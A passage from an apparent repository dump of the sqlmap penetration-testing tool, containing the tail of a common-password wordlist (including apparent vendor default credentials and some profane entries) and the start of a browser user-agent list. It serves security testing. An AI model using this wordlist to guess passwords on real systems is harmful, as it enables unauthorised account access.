hai\nshakira\nshalom\nshaman\nshampoo\nshamrock\nshamus\nshan\nshane\nshang\nshanghai\nshania\nshanna\nshannon\nshannon1\nshanny\nshanti\nshao\nshaolin\nsharc\nshare\nshark\nsharks\nsharky\nsharon\nsharp\nshasta\nshauna\nshaved\nshawn\nshawna\nshayne\nshazam\nshearer\nsheba\nsheba1\nsheeba\nsheena\nsheep\nsheepdog\nsheffield\nshei\nsheila\nshelby\nsheldon\nshell\nshelley\nshelly\nshelter\nshelves\nshemale\nshen\nsheng\nshepherd\nsheridan\nsheriff\nsherlock\nsherman\nsherri\nsherry\nsherwood\nshibby\nshiloh\nshiner\nshinobi\nship\nshirley\nshit\nshitface\nshithead\nshitty\nshiva\nshivers\nshock\nshocker\nshodan\nshoes\nshogun\nshojou\nshonuf\nshooter\nshopper\nshopping\nshort\nshorty\nshorty1\nshotgun\nshou\nshovel\nshow\nshower\nshowme\nshowtime\nshrimp\nshuai\nshuang\nshui\nshun\nshuo\nshuttle\nshutup\nshyshy\nsi_informtn_schema\nsick\nsidekick\nsidney\nsiemens\nsierra\nsigma\nsigmachi\nsignal\nsignature\nsilence\nsilent\nsilly\nsilver\nsilver1\nsilverad\nsilvia\nsimba\nsimba1\nsimmons\nsimon\nsimon1\nsimona\nsimone\nsimple\nsimpson\nsimpsons\nsims\nsimsim\nsinatra\nsinbad\nsinclair\nsinegra\nsingapor\nsinger\nsingle\nsinister\nsinned\nsinner\nsiobhan\nsirius\nsissy\nsister\nsister12\nsisters\nsite\nsiteminder\nsites\nsithlord\nsixers\nsixpack\nsixsix\nsixty\nsixty9\nskate\nskater\nskeeter\nskibum\nskidoo\nskiing\nskillet\nskinhead\nskinner\nskinny\nskip\nskipper\nskipper1\nskippy\nskittles\nskull\nskunk\nskydive\nskyhawk\nskylar\nskylark\nskyler\nskyline\nskywalke\nskywalker\nslacker\nslamdunk\nslammer\nslapper\nslappy\nslapshot\nslater\nslave\nslave1\nslayer\nslayer1\nsleep\nsleeper\nsleepy\nslick\nslick1\nslidepw\nslider\nslim\nslimshad\nslinky\nslip\nslipknot\nslipknot666\nslippery\nsloppy\nslowhand\nslugger\nsluggo\nslut\nsluts\nslutty\nsmackdow\nsmall\nsmart\nsmart1\nsmashing\nsmeghead\nsmegma\nsmelly\nsmile\nsmile1\nsmiles\nsmiley\nsmirnoff\nsmith\nsmiths\nsmitty\nsmoke\nsmoke1\nsmoker\nsmokes\nsmokey\nsmokey1\nsmokie\nsmokin\nsmoking\nsmooch\nsmooth\nsmoothie\nsmother\nsmudge\nsmurfy\nsmut\nsnake\nsnake1\nsnakes\nsnapon\nsnapper\nsnapple\nsnappy\nsnatch\nsneakers\nsneaky\nsnicker\nsnickers\nsniffing\nsniper\nsnooker\nsnoop\nsnoopdog\nsnoopy\nsnoopy1\nsnow\nsnowball\nsnowbird\nsnowboar\nsnowboard\nsnowfall\nsnowflak\nsnowflake\nsnowman\nsnowski\nsnuffy\nsnuggles\nsoap\nsober1\nsoccer\nsoccer1\nsoccer10\nsoccer12\nsoccer2\nsocrates\nsoftail\nsoftball\nsoftware\nsolaris\nsoldier\nsoledad\nsoleil\nsolitude\nsolo\nsolomon\nsolution\nsome\nsomebody\nsomeday\nsomeone\nsomerset\nsomethin\nsomething\nsommer\nsonata\nsondra\nsong\nsonia\nsonic\nsonics\nsonny\nsonoma\nsonrisa\nsony\nsonya\nsonyfuck\nsonysony\nsooner\nsooners\nsophia\nsophie\nsoprano\nsossina\nsoto\nsoul\nsoulmate\nsound\nsouth\nsouthern\nsouthpar\nsouthpark\nsouthpaw\nsowhat\nsoyhermosa\nspace\nspaceman\nspain\nspam\nspanish\nspank\nspanker\nspanking\nspankme\nspanky\nspanner\nsparkle\nsparkles\nsparks\nsparky\nsparky1\nsparrow\nsparrows\nsparta\nspartan\nspartan1\nspartans\nspawn\nspazz\nspeaker\nspeakers\nspears\nspecial\nspecialk\nspectre\nspectrum\nspeed\nspeedo\nspeedway\nspeedy\nspence\nspencer\nspencer1\nsperma\nsphinx\nsphynx\nspice\nspider\nspider1\nspiderma\nspiderman\nspidey\nspierson\nspike\nspike1\nspiker\nspikes\nspikey\nspinner\nspiral\nspirit\nspit\nspitfire\nsplash\nspliff\nsplinter\nspock\nspoiled\nsponge\nspongebo\nspooge\nspooky\nspoon\nspoons\nsport\nsporting\nsports\nsporty\nspot\nspotty\nspread\nspring\nspringer\nsprings\nsprint\nsprinter\nsprite\nsprocket\nsprout\nspud\nspunky\nspurs\nspurs1\nsputnik\nspyder\nsql\nsqlexec\nsquall\nsquare\nsquash\nsqueak\nsqueeze\nsquires\nsquirrel\nsquirt\nsrinivas\nssp\nsss\nssss\nsssss\nssssss\nsssssss\nssssssss\nstacey\nstaci\nstacie\nstacy\nstafford\nstalin\nstalker\nstallion\nstan\nstandard\nstanford\nstang\nstanley\nstaples\nstar\nstar69\nstarbuck\nstarcraf\nstarcraft\nstardust\nstarfire\nstarfish\nstargate\nstarligh\nstarlight\nstarman\nstarr\nstars\nstarship\nstarstar\nstart\nstart1\nstarter\nstartrek\nstarwars\nstate\nstatic\nstation\nstatus\nstayout\nstealth\nsteel\nsteele\nsteeler\nsteelers\nstefan\nstefanie\nstefano\nsteffen\nsteffi\nstella\nstellar\nsteph\nsteph1\nstephan\nstephane\nstephani\nstephanie\nstephen\nstephen1\nstephi\nstereo\nsterling\nsteve\nsteve1\nsteven\nsteven1\nstevens\nstevie\nstewart\nstick\nstickman\nsticks\nsticky\nstiffy\nstimpy\nsting\nsting1\nstinger\nstingray\nstinker\nstinky\nstivers\nstock\nstocking\nstocks\nstockton\nstolen\nstone\nstone1\nstonecol\nstonecold\nstoned\nstoner\nstones\nstoney\nstop\nstorage\nstore\nstories\nstorm\nstorm1\nstormy\nstraight\nstrange\nstranger\nstrangle\nstrap\nstrat\nstrat_passwd\nstratford\nstrato\nstratus\nstrawber\nstrawberry\nstream\nstreaming\nstreet\nstreets\nstrength\nstress\nstretch\nstrider\nstrike\nstriker\nstring\nstrip\nstripper\nstroke\nstroker\nstrong\nstryker\nstuart\nstubby\nstud\nstudent\nstudent2\nstudio\nstudly\nstudman\nstuff\nstumpy\nstunner\nstupid\nstupid1\nstuttgart\nstyle\nstyles\nstylus\nsuan\nsubaru\nsublime\nsubmit\nsuburban\nsubway\nsubzero\nsuccess\nsuccess1\nsuck\nsuckdick\nsucked\nsucker\nsuckers\nsucking\nsuckit\nsuckme\nsucks\nsudoku\nsue\nsugar\nsugar1\nsuicide\nsullivan\nsultan\nsummer\nsummer1\nsummer69\nsummer99\nsummers\nsummit\nsumuinen\nsun\nsunbird\nsundance\nsunday\nsundevil\nsunfire\nsunflowe\nsunflower\nsunlight\nsunny\nsunny1\nsunnyday\nsunrise\nsunset\nsunshine\nsuper\nsuper1\nsuperb\nsuperfly\nsuperior\nsuperman\nsuperman1\nsupernov\nsupersecret\nsupersta\nsuperstage\nsuperstar\nsuperuser\nsupervisor\nsupport\nsupported\nsupra\nsupreme\nsurf\nsurfer\nsurfing\nsurvivor\nsusan\nsusan1\nsusana\nsusanna\nsusanne\nsushi\nsusie\nsutton\nsuzanne\nsuzie\nsuzuki\nsuzy\nsvetlana\nswallow\nswanson\nswearer\nsweden\nswedish\nsweet\nsweet1\nsweetheart\nsweetie\nsweetnes\nsweetness\nsweetpea\nsweets\nsweety\nswim\nswimmer\nswimming\nswinger\nswingers\nswinging\nswitch\nswitzer\nswoosh\nsword\nswordfis\nswordfish\nswords\nswpro\nswuser\nsybil\nsydney\nsylveste\nsylvester\nsylvia\nsylvie\nsymbol\nsymmetry\nsympa\nsynergy\nsyracuse\nsys\nsys_stnt\nsysadm\nsysadmin\nsysman\nsyspass\nsystem\nsystem5\nsystempass\nsystems\nsyzygy\nt-bone\ntab\ntabasco\ntabatha\ntabitha\ntaco\ntacobell\ntacoma\ntaffy\ntahiti\ntaiwan\ntalbot\ntalisman\ntalks\ntalon\ntamara\ntami\ntamie\ntammy\ntamtam\ntang\ntangerine\ntango\ntank\ntanker\ntanner\ntantra\ntanya\ntanya1\ntapani\ntape\ntara\ntardis\ntargas\ntarget\ntarheel\ntarheels\ntarpon\ntarragon\ntartar\ntarzan\ntasha\ntasha1\ntata\ntatiana\ntattoo\ntaurus\ntaxman\ntaylor\ntaylor1\ntazdevil\ntazman\ntazmania\ntbird\ntbone\ntdos_icsap\nteacher\nteam\ntech\ntechnics\ntechno\ntectec\nteddy\nteddy1\nteddybea\nteddybear\nteen\nteenage\nteens\nteflon\ntekila\ntekken\ntelecom\ntelefon\ntelefono\ntelephon\ntelephone\ntemp\ntemp!\ntemp123\ntempest\ntemplar\ntemple\ntemporal\ntemporary\ntemppass\ntemptation\ntemptemp\ntenchi\ntender\ntenerife\nteng\ntennesse\ntennis\ntequiero\ntequila\nterefon\nteresa\nterminal\nterminat\nterminator\nterra\nterrapin\nterrell\nterror\nterry\nterry1\ntest\ntest!\ntest1\ntest12\ntest123\ntest1234\ntest2\ntest3\ntest_user\ntester\ntesti\ntesting\ntesting1\ntestpass\ntestpilot\ntesttest\ntetsuo\ntexas\ntexas1\nthailand\nthanatos\nthanks\nthankyou\nthe\ntheater\ntheatre\nthebear\nthebest\ntheboss\nthecat\nthecrow\nthecure\nthedog\nthedon\nthedoors\nthedude\ntheend\ntheforce\nthegame\nthegreat\ntheir\nthejudge\nthekid\ntheking\nthelma\nthelorax\ntheman\ntheodore\ntheone\nthere\ntheresa\ntherock\ntherock1\nthese\nthesims\nthethe\nthewho\nthierry\nthing\nthinsamplepw\nthirteen\nthis\nthisisit\nthomas\nthomas1\nthompson\nthong\nthongs\nthor\nthorne\nthrasher\nthree\nthreesom\nthroat\nthuglife\nthumb\nthumbs\nthumper\nthunder\nthunder1\nthunderb\nthunderbird\nthursday\nthx1138\ntian\ntiao\ntibco\ntiberius\ntiburon\nticket\ntickle\ntierno\ntiffany\ntiffany1\ntiger\ntiger1\ntiger123\ntiger2\ntigercat\ntigers\ntigers1\ntigger\ntigger1\ntigger2\ntight\ntightend\ntights\ntigre\ntika\ntim\ntimber\ntime\ntimeout\ntimmy\ntimosha\ntimosha123\ntimothy\ntimtim\ntina\nting\ntinker\ntinkerbe\ntinkerbell\ntinman\ntintin\ntiny\ntip37\ntipper\ntitan\ntitanic\ntitanium\ntitans\ntitimaman\ntitleist\ntitouf59\ntits\ntitten\ntitts\ntitty\ntivoli\ntnt\ntoast\ntoaster\ntobias\ntoby\ntoday\ntodd\ntoejam\ntoffee\ntogether\ntoggle\ntoilet\ntokyo\ntoledo\ntolkien\ntom\ntomahawk\ntomas\ntomato\ntomcat\ntommie\ntommy\ntommy1\ntommyboy\ntomorrow\ntomtom\ntong\ntongue\ntonight\ntony\ntoocool\ntool\ntoolbox\ntoolman\ntoon\ntoonarmy\ntootie\ntootsie\ntopcat\ntopdog\ntopgun\ntophat\ntopher\ntopography\ntopper\ntoriamos\ntorino\ntornado\ntoronto\ntorpedo\ntorres\ntortoise\ntoshiba\ntosser\ntotal\ntoto\ntoto1\ntototo\ntottenha\ntottenham\ntoucan\ntouching\ntower\ntowers\ntown\ntoxic\ntoyota\ntrace\ntracer\ntracey\ntraci\ntracie\ntrack\ntracker\ntractor\ntracy\ntrader\ntraffic\ntrailer\ntrails\ntrain\ntrainer\ntraining\ntrains\ntrance\ntranny\ntrans\ntransam\ntransfer\ntransit\ntransport\ntrapper\ntrash\ntrauma\ntravel\ntraveler\ntravis\ntre\ntreasure\ntreble\ntrebor\ntree\ntreefrog\ntrees\ntreetop\ntrek\ntrevor\ntrial\ntriangle\ntribal\ntricia\ntricky\ntrident\ntrigger\ntrinidad\ntrinitro\ntrinity\ntrip\ntriple\ntripleh\ntripod\ntripper\ntrish\ntrisha\ntristan\ntriton\ntriumph\ntrivial\ntrixie\ntrojan\ntrojans\ntroll\ntrombone\ntrooper\ntrophy\ntropical\ntrouble\ntrouble1\ntrout\ntroy\ntruck\ntrucker\ntrucking\ntrucks\ntruelove\ntruman\ntrumpet\ntrunks\ntrust\ntrustme\ntrustno1\ntruth\ntsdev\ntsunami\ntsuser\ntttttt\ntttttttt\ntty\ntuan\ntubas\ntucker\ntucson\ntuesday\ntula\ntulips\ntuna\ntunafish\ntundra\ntupac\nturbine\nturbo\nturbo1\nturbo2\nturkey\nturner\nturnip\nturtle\ntuscl\ntuttle\ntweety\ntweety1\ntwelve\ntwenty\ntwiggy\ntwilight\ntwinkie\ntwinkle\ntwins\ntwisted\ntwister\ntwitter\ntybnoq\ntycoon\ntyler\ntyler1\ntyphoon\ntyrone\ntyson\ntyson1\nultima\nultimate\nultra\num_admin\num_client\numbrella\numesh\numpire\nundead\nunderdog\nundertak\nundertaker\nunderworld\nunhappy\nunicorn\nunicornio\nunique\nunited\nunity\nuniversa\nuniversal\nuniverse\nuniversidad\nuniversity\nunix\nunknown\nunreal\nupsilon\nuptown\nupyours\nuranus\nurchin\nursula\nusa123\nusarmy\nuser\nuser0\nuser1\nuser2\nuser3\nuser4\nuser5\nuser6\nuser7\nuser8\nuser9\nusername\nusmarine\nusmc\nusnavy\nutil\nutility\nutlestat\nutopia\nuucp\nuuuuuu\nvacation\nvader\nvader1\nvagabond\nvagina\nval\nvalencia\nvalentin\nvalentina\nvalentinchoque\nvalentine\nvaleria\nvalerie\nvaleverga\nvalhalla\nvalkyrie\nvalley\nvampire\nvampires\nvancouve\nvanessa\nvanessa1\nvanguard\nvanhalen\nvanilla\nvasant\nvauxhall\nvea\nvector\nvectra\nvedder\nvegas\nvegeta\nvegitto\nveh\nvelo\nvelocity\nvelvet\nvenice\nvenom\nventura\nventure\nvenus\nveracruz\nverbatim\nveritas\nverizon\nvermont\nvernon\nverona\nveronica\nveronika\nversace\nvertex_login\nvertigo\nvette\nvfhbyf\nvfrcbv\nvh5150\nviagra\nvicki\nvickie\nvicky\nvictor\nvictor1\nvictoria\nvictory\nvideo\nvideouser\nvienna\nvietnam\nviewsoni\nvif_dev_pwd\nviking\nvikings\nvikings1\nvikram\nvilla\nvillage\nvincent\nvincent1\nvinnie\nvintage\nviolet\nviolin\nviper\nviper1\nvipergts\nvipers\nvirago\nvirgil\nvirgin\nvirginia\nvirginie\nvirtual\nvirus\nviruser\nvisa\nvision\nvisitor\nvisual\nvivian\nvladimir\nvodka\nvolcano\nvolcom\nvolkswag\nvolley\nvolleyba\nvolume\nvolvo\nvoodoo\nvortex\nvoyager\nvoyager1\nvoyeur\nvrr1\nvrr2\nvsegda\nvulcan\nvvvv\nvvvvvv\nwaffle\nwagner\nwaiting\nwalden\nwaldo\nwalker\nwallace\nwallet\nwalleye\nwally\nwalmart\nwalnut\nwalrus\nwalter\nwalton\nwanderer\nwang\nwanker\nwanking\nwanted\nwarcraft\nwareagle\nwarez\nwargames\nwarhamme\nwarlock\nwarlord\nwarner\nwarning\nwarren\nwarrior\nwarrior1\nwarriors\nwarthog\nwasabi\nwashburn\nwashingt\nwashington\nwasser\nwassup\nwasted\nwatch\nwatcher\nwater\nwater1\nwaterboy\nwaterloo\nwaters\nwatford\nwatson\nwayne\nwayne1\nwealth\nwearing\nweasel\nweather\nweaver\nweb\nwebber\nwebcal01\nwebdb\nwebmaste\nwebmaster\nwebread\nwebster\nwedding\nwedge\nweed\nweed420\nweekend\nweenie\nweezer\nweiner\nweird\nwelcome\nwelcome1\nwelcome123\nwelder\nwendi\nwendy\nwendy1\nweng\nwerder\nwerdna\nwerewolf\nwerner\nwert\nwesley\nwest\nwestern\nwestham\nweston\nwestside\nwestwood\nwetpussy\nwetter\nwfadmin\nwg8e3wjf\nwh\nwhale1\nwhat\nwhatever\nwhatnot\nwhatsup\nwhatthe\nwhatwhat\nwheels\nwhiplash\nwhiskers\nwhiskey\nwhisky\nwhisper\nwhistler\nwhit\nwhite\nwhite1\nwhiteboy\nwhiteout\nwhitesox\nwhitey\nwhiting\nwhitney\nwhocares\nwholesale\nwhore\nwhoville\nwhynot\nwibble\nwicked\nwidget\nwiesenhof\nwifey\nwilbur\nwild\nwildbill\nwildcard\nwildcat\nwildcats\nwilder\nwildfire\nwildman\nwildone\nwildwood\nwill\nwilliam\nwilliam1\nwilliams\nwilliamsburg\nwillie\nwillis\nwillow\nwilly\nwilma\nwilson\nwin95\nwind\nwindmill\nwindow\nwindows\nwindsor\nwindsurf\nwinger\nwingman\nwingnut\nwings\nwinner\nwinner1\nwinners\nwinnie\nwinniethepooh\nwinona\nwinston\nwinston1\nwinter\nwinter1\nwip\nwireless\nwisconsin\nwisdom\nwiseguy\nwishbone\nwives\nwizard\nwizard1\nwizards\nwk_test\nwkadmin\nwkproxy\nwksys\nwkuser\nwms\nwmsys\nwob\nwolf\nwolf1\nwolf359\nwolfen\nwolfgang\nwolfie\nwolfman\nwolfpac\nwolfpack\nwolverin\nwolverine\nwolves\nwoman\nwombat\nwombat1\nwomen\nwonder\nwonderboy\nwood\nwoodie\nwoodland\nwoodstoc\nwoodwind\nwoody\nwoody1\nwoofer\nwoofwoof\nwoohoo\nwookie\nwoowoo\nword\nwordpass\nwordup\nwork\nwork123\nworking\nworkout\nworld\nwormwood\nworship\nworthy\nwowwow\nwps\nwraith\nwrangler\nwrench\nwrestle\nwrestler\nwrestlin\nwrestling\nwright\nwrinkle1\nwriter\nwriting\nwsh\nwsm\nwutang\nwww\nwwwuser\nwwww\nwwwwww\nwwwwwww\nwwwwwwww\nwxcvbn\nwyoming\nx-files\nx-men\nxademo\nxanadu\nxander\nxanth\nxavier\nxcountry\nxdp\nxerxes\nxfer\nxfiles\nxian\nxiang\nxiao\nximena\nximenita\nxing\nxiong\nxla\nxmodem\nxnc\nxni\nxnm\nxnp\nxns\nxprt\nxtr\nxtreme\nxuan\nxxx\nxxx123\nxxxx\nxxxxx\nxxxxxx\nxxxxxxx\nxxxxxxxx\nxyz\nxyz123\nxyzzy\ny\nyaco\nyamaha\nyamahar1\nyamato\nyang\nyankee\nyankees\nyankees1\nyankees2\nyasmin\nyaya\nyeah\nyeahbaby\nyellow\nyellowstone\nyes\nyeshua\nyessir\nyesyes\nyfnfif\nying\nyoda\nyogibear\nyolanda\nyomama\nyong\nyosemite\nyoteamo\nyoung\nyoung1\nyour_pass\nyourmom\nyousuck\nyoyo\nyoyoma\nyoyoyo\nysrmma\nytrewq\nyuan\nyukon\nyummy\nyumyum\nyvette\nyvonne\nyyyy\nyyyyyy\nyyyyyyyy\nyzerman\nzachary\nzachary1\nzack\nzander\nzang\nzanzibar\nzap\nzapata\nzapato\nzaphod\nzappa\nzapper\nzaq123\nzaq12wsx\nzaq1xsw2\nzaqwsx\nzaqxsw\nzebra\nzebras\nzeng\nzenith\nzephyr\nzeppelin\nzepplin\nzero\nzerocool\nzeus\nzhai\nzhang\nzhao\nzhei\nzheng\nzhong\nzhongguo\nzhou\nzhuai\nzhuang\nzhui\nzhun\nzhuo\nzidane\nziggy\nzigzag\nzildjian\nzimmerman\nzipper\nzippo\nzippy\nzirtaeb\nzmodem\nzodiac\nzoltan\nzombie\nzong\nzoomer\nzorro\nzouzou\nzuan\nzwerg\nzxc\nzxc123\nzxccxz\nzxcv\nzxcvb\nzxcvbn\nzxcvbnm\nzxcvbnm1\nzxcxz\nzxczxc\nzxzxzx\nzzz\nzzzxxx\nzzzz\nzzzzz\nzzzzzz\nzzzzzzz\nzzzzzzzz\n"
  },
  {
    "path": "sqlmap/data/txt/user-agents.txt",
    "content": "# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# Opera\n\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.02\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.02\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.52\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.54\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; pl) Opera 8.54\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; da) Opera 8.54\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.0\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.01\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.02\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.52\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.54\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 9.50\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 7.60\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.01\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.02\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.52\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.53\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.54\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.24\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.26\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; es-la) Opera 9.27\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; fr) Opera 8.54\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; IT) Opera 8.0\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; pl) Opera 8.52\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; pl) Opera 8.54\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.0\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.53\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.54\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 9.52\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv) Opera 8.50\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv) Opera 8.51\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv) Opera 8.53\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; tr) Opera 8.50\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; zh-cn) Opera 8.65\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 8.50\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.27\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; ru) Opera 8.50\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.26\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.50\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; tr) Opera 10.10\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; de) Opera 10.10\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.02\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.52\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.54\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.22\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.27\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; ru) Opera 8.51\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.50\nMozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.60\nMozilla/4.0 (compatible; MSIE 8.0; Linux i686; en) Opera 10.51\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; ko) Opera 10.53\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; en) Opera 10.62\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00\nMozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; de) Opera 10.62\nMozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00\nMozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; zh-cn) Opera 8.65\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51\nMozilla/5.0 (Linux i686; U; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51\nMozilla/5.0 (Macintosh; Intel Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27\nMozilla/5.0 (Macintosh; PPC Mac OS X; U; en) Opera 8.51\nMozilla/5.0 (Windows 98; U; en) Opera 8.54\nMozilla/5.0 (Windows ME; U; en) Opera 8.51\nMozilla/5.0 (Windows NT 5.0; U; de) Opera 8.50\nMozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/14.0 Opera/12.0\nMozilla/5.0 (Windows NT 5.1; U; de) Opera 8.50\nMozilla/5.0 (Windows NT 5.1; U; de) Opera 8.52\nMozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51\nMozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52\nMozilla/5.0 (Windows NT 5.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00\nMozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51\nMozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.61\nMozilla/5.0 (Windows NT 5.1; U; en) Opera 8.0\nMozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01\nMozilla/5.0 (Windows NT 5.1; U; en) Opera 8.02\nMozilla/5.0 (Windows NT 5.1; U; en) Opera 8.50\nMozilla/5.0 (Windows NT 5.1; U; en) Opera 8.51\nMozilla/5.0 (Windows NT 5.1; U; en) Opera 8.52\nMozilla/5.0 (Windows NT 5.1; U; en) Opera 8.53\nMozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.22\nMozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.24\nMozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.26\nMozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51\nMozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11\nMozilla/5.0 (Windows NT 5.1; U; es-la; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27\nMozilla/5.0 (Windows NT 5.1; U; Firefox/3.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53\nMozilla/5.0 (Windows NT 5.1; U; Firefox/4.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53\nMozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53\nMozilla/5.0 (Windows NT 5.1; U; fr) Opera 8.51\nMozilla/5.0 (Windows NT 5.1; U; pl) Opera 8.54\nMozilla/5.0 (Windows NT 5.1; U; pl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00\nMozilla/5.0 (Windows NT 5.1; U; ru) Opera 8.51\nMozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50\nMozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53\nMozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70\nMozilla/5.0 (Windows NT 5.2; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27\nMozilla/5.0 (Windows NT 5.2; U; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70\nMozilla/5.0 (Windows NT 